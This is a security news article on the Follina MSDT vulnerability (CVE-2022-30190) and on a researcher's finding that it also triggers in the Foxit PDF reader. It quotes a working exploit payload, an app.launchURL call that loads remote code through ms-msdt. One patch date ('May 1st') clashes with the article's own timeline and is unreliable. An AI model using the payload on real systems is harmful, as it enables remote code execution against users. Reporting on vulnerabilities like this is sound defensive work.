Microsoft Follina Bug also affects PDF Readers

Last week cybersecurity researcher Nao_sec discovered a zero-day vulnerability in Microsoft Office dubbed Follina. The bug can be exploited through the normal opening of a Word document, using it to execute malicious PowerShell commands through the Microsoft Diagnostic Tool (MSDT).

After the vulnerability went public, a number of exploits were released online. Microsoft acknowledged the vulnerability and assigned the unique identity CVE-2022-30190 for remote code execution vulnerability in the Microsoft Support Diagnostic Tool (MSDT). 

Later, Microsoft marked the Follina vulnerability as Zero-day and also share the mitigation measures to block attacks exploiting. Microsoft says the flaw impacts all Windows versions still receiving security updates (Windows 7+ and Server 2008+). 

"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application, and can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights."" Microsoft explains.

PDF readers also vulnerable to Follina 

Today, a Twitter handle @j00sean has demonstrated that the Follina bug (CVE-2022-30190) also triggers in the Foxit PDF reader. 

Tonight while testing PDF Readers, i found a way to trigger CVE-2022-30190 aka #Follina bug in Foxit PDF Reader. This doesn't work in Adobe because of sandbox protections. pic.twitter.com/YmYQl3Z4jI

— j00sean (@j00sean) June 7, 2022

In the POC, the researcher demonstrates the exploit in the Foxit PDF reader version 11.2.2.53575 which is the latest version (according to the version history) of the application at the time of writing. Foxit has not issued any updates for the application nor any security advisories regarding the issue. 

Payload: app.launchURL("ms-msdt:/id PCWDiagnostic /skip force -af //sharedlocation/lol.xml");

The researcher also published the payload for the Foxit PDF reader, but for successful exploitation, users need to allow the connection on the security warning popup. 

A security researcher, Kevin Beaumont explains that the document uses the Word remote template feature to retrieve an HTML file from a remote webserver, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute some PowerShell.

Later on, the researcher also explains that the Follina bug can also be exploited using ms-search MSProtocol. 

microsoft-edge + ms-search + MSDT path traversal 0day = fun of 2-clicks (one click additional due to Protected View if docx is coming from remote btw). pic.twitter.com/W4PwvqFhQu

— j00sean (@j00sean) June 6, 2022

MS-MSDT "Follina" Office click-to-hack. pic.twitter.com/v0DOkQhZjq

— John Hammond is @ RSAC (@_JohnHammond) May 30, 2022

CISA has also urged users and administrators to review Microsoft's Guidance for CVE-2022-30190  and apply the necessary workaround. 

On May 1st, micro patching service "0patch" has released the free Micropatches For "Follina" Microsoft Diagnostic Tool Remote Code Execution 0day (CVE-2022-30190) to block ongoing attacks against Windows systems. 

It is been reported that Chinese-linked threat actors are also actively exploiting a Microsoft Office zero-day vulnerability.  The TA413 APT group, a hacking outfit linked to Chinese state interests, has exploited the vulnerability by targetting the international Tibetan community.

Proofpoint noted that European governments and US local governments were the targets of a phishing campaign using malicious Rich Text Format (RTF) documents designed to exploit the Follina vulnerability. 

"Proofpoint blocked a suspected state-aligned phishing campaign targeting less than 10 Proofpoint customers (European gov & local US gov) attempting to exploit Follina/CVE_2022_30190,"- they wrote.